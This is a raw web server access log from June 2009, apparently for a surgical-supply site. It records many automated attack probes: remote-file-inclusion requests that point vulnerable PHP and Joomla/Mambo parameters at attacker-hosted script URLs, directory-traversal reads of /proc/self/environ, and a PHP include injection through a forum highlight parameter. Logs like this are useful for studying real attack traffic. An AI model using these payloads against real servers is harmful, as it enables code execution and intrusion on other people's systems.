207.210.89.18 - - [19/Jun/2009:04:26:12 -0400] "GET /logs/access_log.Q109052900/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 266 "-" "XXXXXX"
207.210.89.18 - - [19/Jun/2009:04:26:12 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 239 "-" "XXXXXX"
207.210.89.18 - - [19/Jun/2009:04:26:12 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 244 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
207.210.89.18 - - [19/Jun/2009:04:26:12 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
207.210.89.18 - - [19/Jun/2009:04:26:13 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 244 "-" "XXXXXX"
207.210.89.18 - - [19/Jun/2009:04:26:13 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 244 "-" "XXXXXX"
195.34.78.110 - - [19/Jun/2009:04:26:20 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:04:26:20 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:04:26:20 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:04:26:20 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:26:22 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.210.89.18 - - [19/Jun/2009:04:26:26 -0400] "GET /logs/access_log.Q109051100/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
207.210.89.18 - - [19/Jun/2009:04:26:26 -0400] "GET /logs/access_log.Q109051100/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
207.210.89.18 - - [19/Jun/2009:04:26:26 -0400] "GET /logs/access_log.Q109051100/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 266 "-" "XXXXXX"
207.210.89.18 - - [19/Jun/2009:04:26:26 -0400] "GET /logs/access_log.Q109051100/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 266 "-" "XXXXXX"
87.230.22.39 - - [19/Jun/2009:04:26:43 -0400] "GET /logs/access_log.Q109052300%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:26:55 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:04:27:00 -0400] "GET /logs/access_log.Q108020400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
123.143.98.5 - - [19/Jun/2009:04:27:01 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:04:27:03 -0400] "GET /images/index_calciumsulfate.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
123.143.98.5 - - [19/Jun/2009:04:27:23 -0400] "GET /logs/access_log.Q109052300%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:27:25 -0400] "GET /logs/access_log.Q109052300%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:04:29:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
38.99.13.118 - - [19/Jun/2009:04:29:18 -0400] "GET /logs/access_log.Q108101400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
123.143.98.5 - - [19/Jun/2009:04:29:23 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.125.100 - - [19/Jun/2009:04:29:29 -0400] "GET /logs/access_log.Q109050900/rss.php?phpraid_dir=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:29:29 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:04:29:47 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:04:29:47 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:04:29:47 -0400] "GET /logs/access_log.Q109053100//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:04:29:53 -0400] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:04:30:22 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:04:30:22 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:04:30:22 -0400] "GET /logs/access_log.Q109053100//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:04:30:26 -0400] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:30:28 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.125.100 - - [19/Jun/2009:04:30:55 -0400] "GET /logs/access_log.Q109051200/rss.php?phpraid_dir=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:04:31:22 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:04:31:22 -0400] "GET /logs/access_log.Q109053100//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:04:31:22 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:04:31:25 -0400] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:31:26 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.82.142 - - [19/Jun/2009:04:33:16 -0400] "GET /index.php?redir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.78.82.142 - - [19/Jun/2009:04:33:16 -0400] "GET /logs/access_log.Q109060900/index.php?redir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.78.82.142 - - [19/Jun/2009:04:33:16 -0400] "GET /logs/index.php?redir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.78.82.142 - - [19/Jun/2009:04:33:40 -0400] "GET /logs/access_log.Q109060100/index.php?redir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:04:34:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.54.28.163 - - [19/Jun/2009:04:34:49 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 276 "-" "Advanced Browser (http://www.avantbrowser.com)"
190.54.28.163 - - [19/Jun/2009:04:34:49 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 249 "-" "Advanced Browser (http://www.avantbrowser.com)"
190.54.28.163 - - [19/Jun/2009:04:34:49 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 254 "-" "Advanced Browser (http://www.avantbrowser.com)"
190.54.28.163 - - [19/Jun/2009:04:34:55 -0400] "GET /logs/access_log.Q109051300/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
190.54.28.163 - - [19/Jun/2009:04:34:55 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
190.54.28.163 - - [19/Jun/2009:04:34:55 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
210.202.194.157 - - [19/Jun/2009:04:34:55 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:34:55 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
121.78.82.142 - - [19/Jun/2009:04:34:58 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?redir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.202.194.157 - - [19/Jun/2009:04:34:59 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:34:59 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
190.54.28.163 - - [19/Jun/2009:04:35:00 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 276 "-" "XXXXXX"
190.54.28.163 - - [19/Jun/2009:04:35:00 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 249 "-" "XXXXXX"
190.54.28.163 - - [19/Jun/2009:04:35:00 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 254 "-" "XXXXXX"
121.78.82.142 - - [19/Jun/2009:04:35:04 -0400] "GET /logs/access_log.Q109060100%20%20/index.php?redir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.54.28.163 - - [19/Jun/2009:04:35:05 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 276 "-" "XXXXXX"
190.54.28.163 - - [19/Jun/2009:04:35:05 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 249 "-" "XXXXXX"
190.54.28.163 - - [19/Jun/2009:04:35:05 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 254 "-" "XXXXXX"
66.249.71.14 - - [19/Jun/2009:04:35:30 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
124.0.146.100 - - [19/Jun/2009:04:37:04 -0400] "GET /logs//index.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.0.146.100 - - [19/Jun/2009:04:37:09 -0400] "GET //index.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
194.27.51.196 - - [19/Jun/2009:04:37:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
194.27.51.196 - - [19/Jun/2009:04:37:17 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
123.143.98.5 - - [19/Jun/2009:04:37:20 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:37:20 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:37:20 -0400] "GET /logs/error_log.Q109060600%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
62.245.219.245 - - [19/Jun/2009:04:37:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
62.245.219.245 - - [19/Jun/2009:04:37:36 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
62.245.219.245 - - [19/Jun/2009:04:37:39 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
62.245.219.245 - - [19/Jun/2009:04:37:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
200.93.147.154 - - [19/Jun/2009:04:37:43 -0400] "GET /logs//BaseAdmin.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.93.147.154 - - [19/Jun/2009:04:37:43 -0400] "GET //BaseAdmin.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:37:43 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:37:43 -0400] "GET /logs/error_log.Q109060600%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:37:43 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
194.27.51.196 - - [19/Jun/2009:04:37:43 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
194.27.51.196 - - [19/Jun/2009:04:37:43 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
200.93.147.154 - - [19/Jun/2009:04:37:46 -0400] "GET /logs/access_log.Q109053100%20%20//BaseAdmin.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.93.147.154 - - [19/Jun/2009:04:37:58 -0400] "GET //BaseAdmin.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
200.93.147.154 - - [19/Jun/2009:04:37:58 -0400] "GET /logs/access_log.Q109053100%20%20//BaseAdmin.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.93.147.154 - - [19/Jun/2009:04:37:58 -0400] "GET /logs//BaseAdmin.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:04:38:16 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:04:38:16 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.93.147.154 - - [19/Jun/2009:04:38:23 -0400] "GET /logs/access_log.Q109051600%20%20//BaseAdmin.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.93.147.154 - - [19/Jun/2009:04:38:30 -0400] "GET /logs/access_log.Q109051600%20%20//BaseAdmin.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
83.222.193.94 - - [19/Jun/2009:04:39:07 -0400] "GET /logs/access_log.Q109052100//?_zb_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.222.193.94 - - [19/Jun/2009:04:39:07 -0400] "GET //?_zb_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.222.193.94 - - [19/Jun/2009:04:39:07 -0400] "GET /logs//?_zb_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 200 6113 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.59.12.99 - - [19/Jun/2009:04:39:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [19/Jun/2009:04:41:37 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:41:37 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:41:37 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:41:45 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:41:45 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:41:45 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.172.60.242 - - [19/Jun/2009:04:41:56 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://secured-client.com/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.172.60.242 - - [19/Jun/2009:04:41:56 -0400] "GET /popup.php?path=http://secured-client.com/copyright.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.172.60.242 - - [19/Jun/2009:04:41:56 -0400] "GET /logs/popup.php?path=http://secured-client.com/copyright.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.249.71.54 - - [19/Jun/2009:04:42:08 -0400] "GET /images/banner_connect_off.gif HTTP/1.1" 200 6284 "-" "Googlebot-Image/1.0"
66.249.71.54 - - [19/Jun/2009:04:42:09 -0400] "GET /images/store_saws_section.jpg HTTP/1.1" 200 10028 "-" "Googlebot-Image/1.0"
83.222.193.94 - - [19/Jun/2009:04:42:09 -0400] "GET /logs/error_log.Q109052100//?_zb_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
